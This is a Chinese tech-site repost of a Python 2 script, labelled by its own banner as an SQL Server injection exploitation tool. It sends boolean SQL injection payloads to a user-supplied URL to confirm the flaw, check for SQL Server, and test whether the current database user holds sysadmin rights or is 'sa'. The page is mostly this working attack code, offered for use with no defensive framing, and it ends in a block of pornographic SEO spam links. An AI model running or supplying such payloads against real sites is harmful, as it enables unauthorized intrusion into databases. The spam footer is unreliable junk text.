国产99久久精品_欧美日本韩国一区二区_激情小说综合网_欧美一级二级视频_午夜av电影_日本久久精品视频

最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
當前位置: 首頁 - 科技 - 知識百科 - 正文

Python編寫檢測數據庫SA用戶的方法

來源:懂視網 責編:小采 時間:2020-11-27 14:38:20
文檔

Python編寫檢測數據庫SA用戶的方法

Python編寫檢測數據庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll
推薦度:
導讀Python編寫檢測數據庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll

本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下:

# Code by zhaoxiaobu Email: little.bu@hotmail.com 
#-*- coding: UTF-8 -*- 
from sys import exit 
from urllib import urlopen 
from string import join,strip 
from re import search 
 
def is_sqlable(): 
 sql1="%20and%201=2" 
 sql2="%20and%201=1" 
 urlfile1=urlopen(url+sql1) 
 urlfile2=urlopen(url+sql2) 
 htmlcodes1=urlfile1.read() 
 htmlcodes2=urlfile2.read() 
 if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
 print "[信息]恭喜!這個URL是有注入漏洞的!n" 
 print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....." 
 is_SQLServer() 
 else: 
 print "[錯誤]你確定這個URL能用?換個別的試試吧!n"

def is_SQLServer(): 
 sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
 urlfile=urlopen(url+sql) 
 htmlcodes=urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]數據庫好像不是SQL Server的!n" 
 else: 
 print "[信息]確認是SQL Server數據庫!n" 
 print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......" 
 is_sysadmin() 
 
 
def is_sysadmin(): 
 sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]當前數據庫用戶不具有sysadmin權限!n" 
 else: 
 print "[信息]當前數據庫用戶具有sysadmin權限!n" 
 print "[信息]檢測當前用戶是不是SA,請耐心等待......" 
 is_sa() 
 
def is_sa(): 
 sql = "%20and%20'sa'=(select%20System_user)"; 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]當前數據庫用戶不是SA!n" 
 else: 
 print "[信息]當前數據庫用戶是SA!n" 
 
print "n########################################################################n" 
print " ^o^SQL Server注入利用工具^o^ " 
print " Email: little.bu@hotmail.comn" 
print "========================================================================"; 
url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:') 
if url == '': 
 print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式" 
 exit(1) 
 
judge = raw_input("[信息]請提供一個判斷字符串.n判斷字符串:") 
if judge == '': 
 print "[錯誤]判斷字符串不能為空!" 
 exit(1) 
 
is_sqlable()

聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文檔

Python編寫檢測數據庫SA用戶的方法

Python編寫檢測數據庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll
推薦度:
標簽: 方法 用戶 數據
  • 熱門焦點

最新推薦

猜你喜歡

熱門推薦

專題
Top
主站蜘蛛池模板: 亚洲欧美久久精品一区 | 欧美精品观看 | 蜜臀91精品国产高清在线观看 | 国产精品视_精品国产免费 国产精品视频第一区二区三区 | 国产国拍亚洲精品午夜不卡17 | 在线观看中文 | 日本伊人网 | 青青草国产免费国产是公开 | 欧美激情在线精品三区 | 日韩在线观看第一页 | 美女视频黄a视频免费全过程在线 | 日韩系列第一页 | 欧美日韩亚洲一区 | 国产亚洲精品成人婷婷久久小说 | 久久麻豆精品 | 日韩欧美一区二区在线观看 | 亚州一区二区 | 国产成人青青热久免费精品 | 国产精品成人va | 欧美一区二区三区免费播放 | 国产精品美女久久久久 | 亚欧在线观看 | 久久综合精品国产一区二区三区无 | 欧美日韩一 | 国产亚洲综合成人91精品 | 激情综合亚洲欧美日韩 | 国产一区二区三区成人久久片 | 一区二区三区免费在线 | 国模吧双双大尺度炮交gogo | 国产成人精品亚洲一区 | 国产视频一区二区三区四区 | 亚洲欧美日本在线 | 亚洲欧美另类第一页 | 制服丝袜中文在线 | 在线视频 中文字幕 | 麻豆91视频| 欧美一区二区三区在线 | 亚洲精品一 | 亚洲一区免费观看 | 亚欧美| 永久免费观看的毛片的网站下载 |